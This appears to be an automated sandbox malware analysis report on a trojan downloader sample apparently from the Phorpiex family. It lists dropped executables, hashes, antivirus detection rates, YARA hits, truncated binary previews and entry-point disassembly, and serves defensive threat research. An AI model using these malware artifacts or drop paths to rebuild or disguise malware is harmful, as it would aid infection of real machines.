                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:false
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.<...R...R...R.<q)...R.......R...S.|.R......R......R......R......R.Rich..R.................PE..L.....)f.............................!.......0....@.......................................@..................................9.......`.......................p......................................(9..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........P.......0..............@....rsrc........`.......2..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:true
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):22016
                                                                              Entropy (8bit):5.998352128147808
                                                                              Encrypted:false
                                                                              SSDEEP:384:AobmOaVs9vIgkUDsj8Uvw5dTxJjY5av8U9c+yweeeeeeeeWeeeee9MMp:maGOi8UvWdrAa0U1TeeeeeeeeWeeeee
                                                                              MD5:802C60DB52BD6C4DB699A74F63A00D8D
                                                                              SHA1:D9EA28E0576ED14D73A2B8B31933473C00C18EBA
                                                                              SHA-256:F63C124598C87BED71A1E5E6EC5A04E8AA2F18F94B21D690513C5490F7F85991
                                                                              SHA-512:71077859AD12A90A6883DDBB9CF9052173DE4D7008F674D87DDB5BEA1724204F1D66CB4736E8A6C249F223A38A296790A1FBE006BE317058787C5FFDBE0852B8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q'..5Fv^5Fv^5Fv^...^9Fv^<>.^6Fv^5Fw^UFv^<>.^7Fv^<>.^ Fv^<>.^0Fv^<>.^4Fv^Rich5Fv^................PE..L...._;f................."...0.......+.......@....@..................................~....@..................................N......................................................................0N..@............@...............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data........`.......>..............@....rsrc................N..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11264
                                                                              Entropy (8bit):5.27490951248017
                                                                              Encrypted:false
                                                                              SSDEEP:96:PXoAr3+ZhXdzIqD0Mc6ygp4y2wNM+ZSxyqEG0/4qVA5JxGED2qpc2C7tCE1/St8:foaOZ3Rc6y5kSxWwqWJxTDtpw
                                                                              MD5:CAFD277C4132F5D0F202E7EA07A27D5C
                                                                              SHA1:72C8C16A94CCE56A3E01D91BC1276DAFC65B351D
                                                                              SHA-256:E5162FA594811F0F01FC76F4ACBD9FE99B2265DF9CFCBC346023F28775C19F1E
                                                                              SHA-512:7C87D1DEC61B78E0F223E8F9FEC019D96509813FA6D96129289AAB00B2D6F05BF91FE1FAFD680B7D9E746F4C2C8CBE48A3028BCAAD479048D00D79A19F71B196
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.."5..q5..q5..q<..q7..q<..q7..q<..q ..q.;.q>..q5..q...q<..q6..q<..q4..qRich5..q................PE..L...M56f............................v........ ....@..........................`.......u....@..................................)..x....@.......................P......................................@(..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@.......$..............@..@.reloc.."....P.......(..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:true
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):100864
                                                                              Entropy (8bit):6.233380923101525
                                                                              Encrypted:false
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              MD5:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              SHA1:5FF176BFE5E0255A68C8E3D132AFBFF795A1FC1D
                                                                              SHA-256:B00AA26D9D7889613C7552CE6E17B0264788E24C6166EDCF68C47F209CA767F8
                                                                              SHA-512:8E3795BC46783F970C63C56D340E1EB47346BD3E7A9050ED7D1FAC77CDCF96E9EC2A955D56B60CA68556A160AB4C0116B2A51D0BBEE91C5DED72A3B2B81D5FB0
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\3193211493.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....02f.............................u............@.........................................................................l).......................................................................................... ............................text............................... ..`.rdata..:9.......:..................@..@.data....w...@...d...&..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.068292259868492
                                                                              Encrypted:false
                                                                              SSDEEP:96:+5CDsnMkI2dyDHFcq+BIkAs7n3QJxGENUOq2qh3C7tCEI4LO:+52sMkIDcq++viQJxTNUOqthcI4K
                                                                              MD5:11D2F27FB4F0C424AB696573E79DB18C
                                                                              SHA1:D08ECE21A657BFA6EA4D2DB9B21FBB960D7F4331
                                                                              SHA-256:DEE9DCA027009B7D2885ACE7B968D2E9505A41B34756B08343338F8EF259E9BE
                                                                              SHA-512:A60DE41CAA6113430AB4AB944B800579F574F9B964C362F9C62BBFC1BD85DCCD01B628809367E15CFE6BAABA32C1255F8DB07E434FF7BCF5E90D9B3D1F6A4CD4
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 62%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L...X.8f............................@........ ....@..........................`......k.....@..................................$..x....@.......................P..`...................................P#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4096
                                                                              Entropy (8bit):4.812492307333934
                                                                              Encrypted:false
                                                                              SSDEEP:96:gGTlz8/YYd48cUlqcFBtiA2ByJ5G+vt9OobxUql70/a0cpHtM:rzCXd48oQitA7G+iUGRcA
                                                                              MD5:139CC3E34A16B56A9EAE4A815668F40D
                                                                              SHA1:FC1AA1349D9821633A1CEF53C18A82D013A9B98B
                                                                              SHA-256:072C6AA931CE5EC96A84259636C353164407F355503193ED5A8DAC072E5F811D
                                                                              SHA-512:2BB58EFBF5CF368DAF1EB0DA303A5EFDB7E778D80D30363B1DB7D79036DF082191421FD82632BAE1BF855B820D5893868FAF3545A050D912CD62F06276D7848A
                                                                              Malicious:false
                                                                              Preview:.Fy.....Y..G....T5.j...._........#+q.....................$j.....[.*......N....X..j......,*.......Q....\/......_;.......#............._;....................[.:.....F5.....m..................F....W.......%..6....m>.O......Z..............Lv.......~....W..A....\/|6....P........A.................I......yQ....%c6.....mJE+...._;.......".....N'......R..(....M,.......m.....T.H.....<.........E......."......q......dc.............x.c....._:.......#......^.......N'.j....%..%.....?L&...................>......%.........vR....Y..j....Y.xR.....u........i......>......?]>............X.N....]vc.............N&k.......I......................B......`......lM........8....\.......N'.)....%.........|>....]..E......^.......9V.....x........C............._9.r....M.).....Y.......\/.3.....?F^......:.....-..z....PP.Y....%x......_.W...........Y.5n.............................Q.............x......_;......R.......g.M.....U.V.....Yj.:....N'.6....^.Ez....\|......[\.g.....Y......Y.>.....;[.s......`.....
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.<...R...R...R.<q)...R.......R...S.|.R......R......R......R......R.Rich..R.................PE..L.....)f.............................!.......0....@.......................................@..................................9.......`.......................p......................................(9..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........P.......0..............@....rsrc........`.......2..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):100864
                                                                              Entropy (8bit):6.233380923101525
                                                                              Encrypted:false
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              MD5:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              SHA1:5FF176BFE5E0255A68C8E3D132AFBFF795A1FC1D
                                                                              SHA-256:B00AA26D9D7889613C7552CE6E17B0264788E24C6166EDCF68C47F209CA767F8
                                                                              SHA-512:8E3795BC46783F970C63C56D340E1EB47346BD3E7A9050ED7D1FAC77CDCF96E9EC2A955D56B60CA68556A160AB4C0116B2A51D0BBEE91C5DED72A3B2B81D5FB0
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysbrapsvc.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....02f.............................u............@.........................................................................l).......................................................................................... ............................text............................... ..`.rdata..:9.......:..................@..@.data....w...@...d...&..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.<...R...R...R.<q)...R.......R...S.|.R......R......R......R......R.Rich..R.................PE..L.....)f.............................!.......0....@.......................................@..................................9.......`.......................p......................................(9..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........P.......0..............@....rsrc........`.......2..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.233380923101525
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              File size:100'864 bytes
                                                                              MD5:0a547347b0b9af0290b263dfa8d71ebe
                                                                              SHA1:5ff176bfe5e0255a68c8e3d132afbff795a1fc1d
                                                                              SHA256:b00aa26d9d7889613c7552ce6e17b0264788e24c6166edcf68c47f209ca767f8
                                                                              SHA512:8e3795bc46783f970c63c56d340e1eb47346bd3e7a9050ed7d1fac77cdcf96e9ec2a955d56b60ca68556a160ab4c0116b2a51d0bbee91c5ded72a3b2b81d5fb0
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              TLSH:ADA375839461B47FEFE98AB991F18E68542CBB75138848E391502657C7243FFFCB9026
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9...............
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x407500
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x663230CC [Wed May 1 12:08:44 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2e23372b9869b74c90162a6fda4f170d
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 00000FF0h
                                                                              push 000007D0h
                                                                              call dword ptr [0041013Ch]
                                                                              push 0041431Ch
                                                                              push 00000000h
                                                                              push 00000000h
                                                                              call dword ptr [00410098h]
                                                                              mov dword ptr [ebp-00000E5Ch], eax
                                                                              call dword ptr [0041009Ch]
                                                                              cmp eax, 000000B7h
                                                                              jne 00007FD23523C9CAh
                                                                              push 00000000h
                                                                              call dword ptr [004100A0h]
                                                                              mov dword ptr [ebp-0000062Ch], 00000000h
                                                                              mov dword ptr [ebp-0000041Ch], 00000000h
                                                                              mov dword ptr [ebp-0000083Ch], 00000001h
                                                                              mov dword ptr [ebp-00000210h], 00000004h
                                                                              push 00000105h
                                                                              push 0041AA40h
                                                                              push 00000000h
                                                                              call dword ptr [004100B0h]
                                                                              push 0041AA40h
                                                                              call dword ptr [0041017Ch]
                                                                              mov dword ptr [ebp-0000020Ch], eax
                                                                              push 0041AA40h
                                                                              push 004112D8h
                                                                              lea eax, dword ptr [ebp-00000208h]
                                                                              push eax
                                                                              call dword ptr [0041019Ch]
                                                                              add esp, 0Ch
                                                                              lea ecx, dword ptr [ebp-00000208h]
                                                                              push ecx
                                                                              call dword ptr [004100C0h]
                                                                              push 00000104h
                                                                              lea edx, dword ptr [ebp-00000E58h]
                                                                              push edx
                                                                              push 00411300h
                                                                              call dword ptr [004100A4h]
                                                                              Programming Language:
                                                                              • [ C ] VS2005 build 50727
                                                                              • [IMP] VS2005 build 50727
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [C++] VS2008 SP1 build 30729
                                                                              • [LNK] VS2008 SP1 build 30729
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1296c0x104.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x100000x320.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
